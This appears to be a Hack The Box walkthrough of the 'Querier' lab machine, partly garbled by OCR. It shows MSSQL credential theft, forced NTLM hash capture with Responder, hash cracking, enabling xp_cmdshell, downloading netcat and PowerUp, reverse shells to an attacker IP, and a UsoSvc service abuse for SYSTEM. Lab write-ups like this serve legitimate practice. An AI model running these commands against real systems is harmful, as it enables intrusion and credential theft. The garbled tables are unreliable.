### Querier

| ======================================= | === |
|-----------------------------------------|-----|
| QUERIER 10.10.10.125                    |     |
| ======================================= | === |

# InfoGathering

| OPEN PORTS                                                                                                    |  |  |  |  |  |  |  |  |  |  |
|----------------------------------------------------------------------------------------------------|--|--|--|--|--|--|--|--|--|--|
| PORT STATE SERVICE<br>21/tcp open ftp<br>22/tcp open ssh<br>53/tcp open domain<br>80/tcp open http<br>139/tcp open netbios-ssn<br>443/tcp open https<br>445/tcp open microsoft-ds                                                                                                    |  |  |  |  |  |  |  |  |  |  |
| SQL INFORMATION                                                                                                    |  |  |  |  |  |  |  |  |  |  |
| 1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00<br>  ms-sql-ntlm-info:<br>  Target_Name: HTB<br>  NetBIOS_Domain_Name: HTB<br>  NetBIOS_Computer_Name: QUERIER<br>  DNS_Domain_Name: HTB.LOCAL<br>  DNS_Computer_Name: QUERIER.HTB.LOCAL<br>  DNS_Tree_Name: HTB.LOCAL<br>  Product_Version: 10.0.17763 |  |  |  |  |  |  |  |  |  |  |
| SMB INFORMATION                                                                                                    |  |  |  |  |  |  |  |  |  |  |
| Sharename   Type   Comment                                                                                                    |  |  |  |  |  |  |  |  |  |  |
| ADMIN\$   Disk   Remote Admin<br>C\$   Disk   Default share<br>IPC\$   IPC   Remote IPC<br>Reports   Disk                                                                                                    |  |  |  |  |  |  |  |  |  |  |

## **Gaining Access**

SMB PORT IS OPEN. LETS SEE WHAT DIRECTORIES WE CAN FIND

\_\_\_\_\_

\_\_\_\_\_

smbclient -L 10.10.10.125

### root@kali:~/HTB/boxes/Querier# smbclient -L 10.10.10.125 Enter WORKGROUP\root's password:

Sharename Comment Type - - - -ADMINS Disk Remote Admin Default share C\$ Disk IPC\$ IPC Remote IPC Disk Reports Reconnecting with SMB1 for workgroup listing. Connection to 10.10.10.125 failed (Error NT\_STATUS\_RESOURCE\_NAME\_NOT\_FOUND) Failed to connect with SMB1 -- no workgroup available

Reports is unusual as it does not have Comment next to it like the others. We check that out first. smbclient \\10.10.10.125\Reports Enter WORKGROUP\root's password: smb: \> ls Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019 smb: \> get "Currency Volume Report.xlsm"

username: `reporting`

password: `PcwTWTHRwryjc\$c6`

LOGIN TO SQL CLIENT

python mssqlclient.py QUERIER/reporting:PcwTWTHRwryjc\\$c6@10.10.10.125 -windows-auth root@kali:=/HTB/boxes/Querier# python mssqlclient.py QUERIER/reporting:PcwTWTHRwryjc\\$c6@10.10.10.125 -windows-auth Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation [\*] Encryption required, switching to TLS [\*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume [\*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us english [\*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: 16192 [\*] INFO(QUERIER): Line 1: Changed database context to 'volume'. [\*] INFO(QUERIER): Line 1: Changed language setting to us\_english. [\*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL> [NTB] 0:openvpn- 1:python\*

XP\_CMDSHELL CAN NOT BE TURNED ON BY THIS USER. WE SET UP RESONDER TO TRY TO GET ANOTHER USER

| SQL> | 0  | le | cl  | a  | re | 0  | q  | ۷  | ar | °C | ha | ۱r | (9  | 99 | );  | S  | et |    | 00 | 1= | ·' \ | // | 1  | Θ. | 1  | Θ  | . 1 | 4 | . 2 | 1 | te | S  | t' | ;  | e  | X  | ec | 2 | ma | 15 | te | r | . d | bo | ). | хţ | )_ | d | ir | t١ | re | е  | @0 | 1 |  |
|------|----|----|-----|----|----|----|----|----|----|----|----|----|-----|----|-----|----|----|----|----|----|------|----|----|----|----|----|-----|---|-----|---|----|----|----|----|----|----|----|---|----|----|----|---|-----|----|----|----|----|---|----|----|----|----|----|---|--|
| subd | ir | -e | ct  | 0  | гy |    |    |    |    |    |    |    |     |    |     |    |    |    |    |    |      |    |    |    |    |    |     |   |     |   |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    |    |   |    |    |    |    |    |   |  |
|      |    |    |     |    |    |    |    |    |    |    |    |    |     |    |     |    |    |    |    |    |      |    |    |    |    |    |     |   |     |   |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    | a  | e | Dτ | n  |    |    |    |   |  |
|      |    |    |     |    | -  |    |    |    |    |    |    |    |     | -  |     |    |    |    |    |    |      |    |    |    |    |    | -   |   |     |   |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    |    |   |    |    | -  |    |    | - |  |
|      |    |    |     |    | -  |    |    | 1  |    |    |    |    |     |    | • • |    |    | -  |    |    |      |    |    |    |    |    |     |   |     | - |    |    |    |    |    |    |    |   |    |    | -  |   |     | -  |    |    |    |   |    |    |    |    |    |   |  |
| SQL> | E  | X  | EC  | 5  | sp | _c | 01 | ١f | iç | ju | re | 1  | ' s | ۶h | 0٧  | l  | ac | v  | ar | ۱C | e(   |    | 0  | рt | 1  | 01 | าร  |   | P   | 1 |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    |    |   |    |    |    |    |    |   |  |
| [-]  | EF | ۲R | OR  | () | ĴΠ | ER | I  | R  | ): |    | Li | .n | e   | 1  | 65  | i: | ι  | Js | eı | r  | do   | De | !S | r  | 10 | t  | h   | a | ve  |   | pe | rı | ni | S. | si | .0 | n  | t | 0  | р  | er | f | ٥r  | m  | t  | hi | LS | ě | ac | t: | ĹΟ | n. |    |   |  |
| SQL> |    |    |     |    |    |    |    |    |    |    |    |    |     |    |     |    |    |    |    |    |      |    |    |    |    |    |     |   |     |   |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    |    |   |    |    |    |    |    |   |  |
| [HTB | 1  | 0  | : 0 | pe | en | vp | n  |    | 1: | S  | QL | *  | 2   | :: | Гe  | s  | po | n  | de | eг | -    | 3  | :  |    | 15 | h  |     |   |     |   |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    |    |   |    |    |    |    |    |   |  |
|      |    |    |     |    |    |    |    |    |    |    |    |    |     |    |     |    |    |    |    |    |      |    |    |    |    |    |     |   |     |   |    |    |    |    |    |    |    |   |    |    |    |   |     |    |    |    |    |   |    |    |    |    |    |   |  |

responder -I tun0

ISSUE THIS COMMAND IN SQL AND CHECK RESPONDER

\_\_\_\_\_

declare @q varchar(99);set @q='\\10.10.14.12\test'; exec master.dbo.xp\_dirtree @q

CRACK THE HASH

-----

(If you havent already, unpack the rockyou.txt.gz file)

gzip -d /usr/share/wordlists/rockyou.txt.gz

john --format=netntlmv2 hash.txt --wordlist=/usr/share/worldists/rockyou.txt

NOTE: If you are like me and hashcat doesnt work on your machine because the developers cant make an application that works with 16Gb of RAM and GEForce Video Card and an i7 Processor 3.2Ghz you can use John. Hashcat would be great if it didnt suck.

hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt --force

\_\_\_\_\_

HASH AFTER CRACK

username: `mssql-svc` password: `corporate568`

To bad hashcat doesn't work for sh\*\*. It could have cracked that.

\_\_\_\_\_

LOGIN TO SQL WITH NEW CREDS AND TURN ON XP\_CMDSHELL

python mssqlclient.py QUERIER/mssql-svc:corporate568@10.10.10.125 -windows-auth

Enter the below commands into SQL. EXEC sp\_configure 'show advanced options', 1 RECONFIGURE EXEC sp\_configure 'xp\_cmdshell', 1 RECONFIGURE

| rootgkall:~/HTB/boxes/Querier# python #ssqlclient.py QUERIER/mssql-svc:corporate568010.10.10.125 -windows-auth                           |
|----------------------------------------------------------------------------------------------------|
| Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation                                                                             |
|                                                                                                    |
| [*] Encryption required, switching to TLS                                                                                                |
| [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master                                                                            |
| (*) ENVCHANGE(LANGUAGE): Old Value: None, New Value: us english                                                                          |
| [*] ENVCHANGE(PACKETSIZE): Old Value: 4896, New Value: 16192                                                                             |
| [*] INFO(QUERIER): Line 1: Changed database context to 'master'.                                                                         |
| [*] INFO(QUERIER): Line 1: Changed language setting to us_english.                                                                       |
| [*] ACK: Result: 1 - Microsoft SQL Server (140 3232)                                                                                     |
| <ol> <li>Press help for extra shell commands</li> </ol>                                                                                  |
| SQL> EXEC sp_configure 'show advanced options', 1                                                                                        |
| [*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 8 to 1. Run the RECONFIGURE statement to install. |
| SQL> RECONFIGURE                                                                                                    |
| SQL> EXEC sp_configure 'xp_cmdshell', 1                                                                                                  |
| [*] INFO(QUERIER): Line 185: Configuration option 'xp endshell' changed from 0 to 1. Run the RECONFIGURE statement to install.           |
| SQL> RECONFIGURE                                                                                                    |
| S0L>                                                                                                    |
| [HTR] B: openuon 1:SBL* 2: responder. 3:bash                                                                                             |

#### NOW UPLOAD FILES AND CREATE A REVERSE SHELL

-----

Use the python Simple HTTP Server Module to server the files you want uploaded. python -m SImpleHTTPServer

EXEC xp\_cmdshell 'powershell -c "Invoke-WebRequest -Uri 10.10.14.2:8000/nc64.exe -OutFile C: \Users\mssql-svc\nc64.exe"' (netcat for windows)

| NULL<br>SOLE EVEC an endeboll idie Collegesterel evel |  |
|-------------------------------------------------------|--|
| RULL                                                  |  |
| ETH & ETEF we suddhell 'die f:\lleese\usedl.eus'      |  |
| output                                                |  |
|                                                       |  |
| Volume in drive C has no label.                       |  |
| Volume Serial Number is FE98-F373                     |  |
| NULL                                                  |  |
| Directory of C:\Users\mssql-svc                       |  |
| NULL.                                                 |  |
| 03/05/2019 12:03 AM <dir> .</dir>                     |  |
| 03/05/2019 12:03 AM <dir></dir>                       |  |
| 01/28/2019 11:42 PM <dir> 3D Objects</dir>            |  |
| 01/28/2019 11:42 PM <dir> Contacts</dir>              |  |
| 01/28/2019 11:42 PM <dir> Desktop</dir>               |  |
| 01/28/2019 11:42 PM <dir> Documents</dir>             |  |
| 01/28/2019 11:42 PM <dir> Downloads</dir>             |  |
| 01/28/2019 11:42 PM <dir> Favorites</dir>             |  |
| 01/28/2019 11:42 PM <dir> Links</dir>                 |  |
| 01/28/2019 11:42 PM <dir> Music</dir>                 |  |
| 03/05/2019 12:03 AM 43,696 nc64.exe                   |  |
| 01/28/2019 11:42 PM <dir> Pictures_</dir>             |  |

As we can see in the image above I verified the application was uploaded. I also want to upload PowerUp.ps1 EXEC xp\_cmdshell 'powershell -c "Invoke-WebRequest -Uri 10.10.14.2:8000/PowerUp.ps1 -OutFile C: \Users\mssql-svc\PowerUp.ps1"'

EXECUTE COMMANDS USING XP\_CMDSHELL SQL> EXEC xp\_cmdshell 'C:\Users\mssql-svc\nc64.exe 10.10.14.2 8088 -e powershell'

SQL> EXEC xp\_cmdshell 'powershell -c "Invoke-WebRequest -Uri 10.10.14.2:8000/PowerUp.ps1 -OutFile C:\Users\mssql-svc\PowerUp.ps1\*' SQL> EXEC xp\_cmdshell 'C:\Users\mssql-svc\nc64.exe 10.10.14.2 8088 -e powershell'

Now we have a shell!!! No thanks to that garbage hashcat.

root@kali:~/HTB/boxes/Querier# nc -lvnp 8088
listening on [any] 8088 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.125] 49681
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

PWN USER FLAG

| PS C:\Users\<br>ls                                                                                                    | \mssql-svc\De | esktop> ls    |             |          |  |  |  |  |  |  |
|----------------------------------------------------------------------------------------------------|---------------|---------------|-------------|----------|--|--|--|--|--|--|
| Director                                                                                                    | ry: C:\Users\ | .mssql-svc\De | sktop       |          |  |  |  |  |  |  |
| Mode                                                                                                    | Last          | WriteTime     | Length      | Name     |  |  |  |  |  |  |
|                                                                                                    |               |               |             |          |  |  |  |  |  |  |
| -a                                                                                                    | 1/28/2019     | 12:08 AM      | 33          | user.txt |  |  |  |  |  |  |
| PS C:\Users\mssql-svc\Desktop> Get-Content user.txt<br>Get-Content user.txt<br>c37b41bb669da345bb14de50faab3c16<br>PS C:\Users\mssql-svc\Desktop> _ |               |               |             |          |  |  |  |  |  |  |
| [HTB] 0:oper                                                                                                    | vpn 1:SQL-    | 2:responder   | 3:http 4:ne | etcat*   |  |  |  |  |  |  |
|                                                                                                    |               |               |             |          |  |  |  |  |  |  |

type user.txt c37b41bb669da345bb14de50faab3c16

# PrivEsc

IMPORT POWERUP MODULE
PS C:\users\mssql-svc> Import-Module ./PowerUp.ps1
PS C:\Users\mssql-svc> Get-ModifiableService
PS C:\Users\mssql-svc> Import-Module ./PowerUp.ps1
PS C:\Users\mssql-svc> Get-ModifiableService
Get-ModifiableService
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True

Now we know we can abuse the service UsoSvc so lets do it. Open another netcat listener. nc -lvnp 8087

PS C:\users\mssql-svc> Invoke-ServiceAbuse -Name 'UsoSvc' -command "C:\Users\mssql-svc\nc64.exe 10.10.14.28 8087 -e powershell"

```
root@kali:~/HTB/boxes/Querier# nc -lvnp 8087
listening on [any] 8087 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.125] 49684
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
QUERIER
PS C:\Windows\system32> ____
```

### Directory: C:\Users\Administrator\Desktop

| Mode | LastWriteTi     | .me Length | Name     |
|------|-----------------|------------|----------|
|      |                 |            |          |
| -ar  | 1/28/2019 12:08 | AM 33      | root.txt |

### PS C:\Users\Administrator\Desktop> Get-Content root.txt Get-Content root.txt b19c3794f786a1fdcf205f81497c3592 PS C:\Users\Administrator\Desktop>

HTB] 0:openvpn 1:SQL 2:responder 3:http 4:netcat- 5:nc2\*

cd C:\Users\Administrator\Desktop type root.txt b19c3794f786a1fdcf205f81497c3592

OR TO GET ROOT WE CAN DO THE FOLLOWING

#### Invoke-AllChecks

[\*] Checking for cached Group Policy Preferences .xml files....

Changed : {2019-01-28 23:12:48} UserNames : {Administrator} NewName : [BLANK] Passwords : {MyUnclesAreMarioAndLuigi!!1!} File : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

INVOKE-ALLCHECKS GIVES US ADMIN CREDS [\*] Checking for cached Group Policy Preferences .xml files.... Changed : {2019-01-28 23:12:48} UserNames : {Administrator} NewName : [BLANK] Passwords : {MyUnclesAreMarioAndLuigi!!1!} File : C:\ProgramData\Microsoft\Group

username: `Administrator` password: `MyUnclesAreMarioAndLuigi!!1!